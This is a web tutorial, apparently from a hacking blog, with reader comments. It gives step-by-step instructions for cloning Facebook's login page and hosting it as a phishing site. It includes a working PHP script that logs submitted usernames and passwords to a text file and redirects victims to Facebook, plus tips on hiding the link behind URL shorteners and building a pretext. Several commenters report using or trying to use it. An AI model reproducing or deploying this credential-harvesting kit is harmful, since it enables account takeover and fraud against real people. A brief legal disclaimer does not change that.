
How to hack Facebook by creating a custom Phishing page
Hello and welcome to another Facebook hacking tutorial. This time I will be showing you how to manually create a phishing page and hack Facebook with phishing and social engineering.
I will show two methods one is the easy one for beginners who want to just test the hack and the second one is for those wanting to learn hacking and pentesting and create their custom Facebook phishing page.
A phishing attack is the attack method used by hackers in which they create a copy of the original site which is exactly the same as the original website. Then by using social engineering and creativity, they send the phishing link to people to sign in. Once someone signs in their credentials. Hackers can easily get the username and password of the victim in text format.
So in this tutorial, I’m going to explain both the easy and the technical way of hacking facebook with a custom phishing page.
Table of contents
Easy method for hacking facebook:
- Download the hack files: For mobile and for desktop (prefer desktop since they are undetected)
- Free hosting: 000webhost
- You can actually use any hosting but I would suggest this since its that’s what I will be using for this tutorial.
Steps to create a Fake Facebook phishing page :
Step 1: Visit the 000webhost website and click on SignUp for FREE using any email. It’s very important to Verify your Email via the validation message you receive for your account to be active.

Step 2: Now register using your Email id, set a password and select a website name which is good for your phishing.
Step 3: After verification of your Email Address, click on File Manager and then click on Upload files Now as shown in the image below:

Step 4: Now you will be redirected to the actual File Manager of your website which is as shown below:

Step 5: You will start at the public_html Folder, which is exactly where you want to be. Upload both the files downloaded index.html and post.php depending on whether you want to hack mobile or desktop version of facebook.

Step 6: Click on upload icon in the Right corner of the File Manager as shown in the image below.
Step 7: Now select both the files index.htm and post.php and click on the upload button as shown in the image below:

Step 8: Navigate to Website list in the panel and copy your Website link address which you previously created. “The domain that was created by the hosting”
Mobile Facebook Phishing page:

Desktop facebook phishing page:

Step 9:Once the target logins to the website you will see the following file called username.txt in the file manager as shown below:

Step 10: Open the file to see the email id and password of the account.
Here I used: sas and sas as my facebook email and facebook password.

Viola, you have successfully hacked facebook account using phishing.
Now for those willing to learn let’s learn the technical details of hacking facebook manually here is the advanced version where you make your files.

Advanced method: making your custom facebook phishing page manually.
Step 1: Open facebook.com
To create a phishing page, go to the Facebook.com and then right-click on the blank area. You will see many options you need to click on the view source page option. As you can see below in the image.

Step 2: Create a local copy of the facebook page for making the phishing page
When you click on view page source a new tab will open as shown below showing all bunch of code. This is the source code of the facebook page. You are going to edit it so that you can use it to make a facebook phishing page. To do that:
Select all code and copy all code and paste it into notepad and save the file as index.htm. The file extension is .htm not .html do not make this mistake.

Facebook page source

Copied facebook source code for phishing in notepad
Step 3: Edit the source code
Now open notepad in which you have pasted this code and press CTRL+F and type ACTION in the search bar. This is a little tricky but you have to find the following line in the code.
action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"

When you find the code similar to the code I mentioned above, delete all the text code in front of the word action and replace it with the word post.php as shown below:
Then the final code will look like this:
action="post.php"

Facebook page source edited for phishing
Step 4: Save the files
Now if you haven’t already saved it, then save it to a new folder with the name index.htm Now you have completed part one of the phishing page.
Step 5: Creating the PHP file
To create the second part of facebook phishing page you need to create a PHP file. I am naming my file as post.php since that is what I edited in the source code in part one. If you plan on using a different name make sure to change it in index.htm as well.
Open a new notepad file and copy the code given below and save it with the name post.php. You can refer the images below for reference:

<?php header (‘Location:http://www.facebook.com/’); $handle = fopen(“usernames.txt”, “a”); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, “=”); fwrite($handle, $value); fwrite($handle, “\r\n”); } fwrite($handle, “\r\n”); fclose($handle); exit; ?>
Step 6: Copy the facebook phishing files together
Now, You have successfully created two files which should be saved in the same folder.
- index.htm
- post.php

Step 7: Create an account free hosting web account
Visit the 000webhost website and click on SignUp for FREE using any email. It’s very important to Verify your Email via the validation message you receive for your account to be active.
Step 8: Open file manager and Upload the files
Now open Cpanel (control panel) on the dashboard of your hosting. Open the file manager and then click on file manager go to public_html folder. By default, you should be in this folder
Step 9: Upload index.htm and post.php
Click on upload files button and upload both files you had previously saved as shown in the images below.

Step 10: Make sure all the files are uploaded.
Make sure all the phishing files are uploaded and then open your website. You should see the original facebook page but when you see the URL you will know that it is a phishing page

Step 11: Navigate to Website list in the panel and copy your Website link address which you previously created.
Desktop facebook phishing page:

Step 12:Once the target logins to the website you will see the following file called username.txt in the file manager as shown below:

Step 13: Open the file to see the email id and password of the account.
Here I used: sas and sas as my facebook email and facebook password.

Viola, you have successfully hacked facebook account using phishing. This is your custom made phishing page for Facebook. Hope you liked it and it worked as expected.
Social engineering tricks hackers use to hack facebook:
1)When you are trying to send phishing link to the target victim, you need to use a URL shortener like TinyURL that will help mask the domain.
2) Choose a good domain which will be trusted by the target.
3) Be creative. A good pretext is needed so that the target will not suspect.
Commonly Asked Questions about hacking facebook with OSIF
Below are some of the questions which may come into your mind while trying to use this hack. If your question is not present then kindly mention it in the comment section.
Q1. Is this hacking tool legal to use on anyone?
No, you should not use this knowledge to hack people. If you use it to hack someone’s Facebook account, then it is considered as a criminal offence and you will responsible for any illegal actions you do. But you can use it for testing and gaining knowledge about how hackers hack facebook using phishing and other attacks.
Q2. Are there any alternatives to this method?
Yes, there are many methods to hack facebook account. The most famous is zshadow,shadowave, and anomor. You can also use Kali Linux to hack facebook by making a custom phishing page.
Q3. Are there any other ways other than phishing?
Bruteforce and tools such as facebook password extractor will work. You can also use usb stealer for hacking facebook accounts.
Q4. Its not working what do I do?
Make sure the file has .htm extension and not .html. Compare my files with yours. Try step by step. Mobile may or may not work since it might be easily detected.
Upload both files with proper names index.htm and post.php. If you have some unknown error comment them below.
25 Comments
BRO I CAN’T SEE USERNAME.TXT PLZ HELP
You need to make a username.txt with possible usernames. You can find such files on the internet
Sir please help me. My Facebook account has been hacked. I need your help
same problem bhai mere me b show nahi kr sari username.txt file please help
You have to create a username file or download it from the internet
Hi bro is app muje shamil krlo
hello friend
thank u for everything .however, I did just like you did above, but when i log in there’s no a file called “usernames” shows up in file manager ??? !!
pls confirm ASAP
The current Facebook source code does not include the line which you have mentioned starting with action=.
What should I do now?
Check other methods on the site.
Did you later later solved the line I’m facing the same trouble now thank you
I cannot fine the text”action”
Facebook has changed the code on the site. Use other methods
Me Upload to kar diya but ab Open kaise karna hoga Please help me
what or how to find other methods
do u know another method?
please help me
Check other methods on the website
Sir, please how and where will I download the Facebook hacking fille
Can you please explain step no 8 of first tutorial?
From where I get the Link??
Hello sir,
I follow all instructions and it works, but only in pc. In mobile loading stuck at middle and didn’t move. Pls help me
its showing email correctly but password in coding not in alphabets
Post the username.txt file here please
please post the username.txt file and tell us what should we do with this file?
Hey mate. Epic! It works, i’ve tested on my own account however, 000webhost is no good. They know immediately what i was up to and they put my site on Sleeping so i couldn’t click it anymore. Terms of violation were broken. Know a better hosting site?
Instead of 000webhost,what other Web hosting company can I use?
it is showing only the email id but not password why?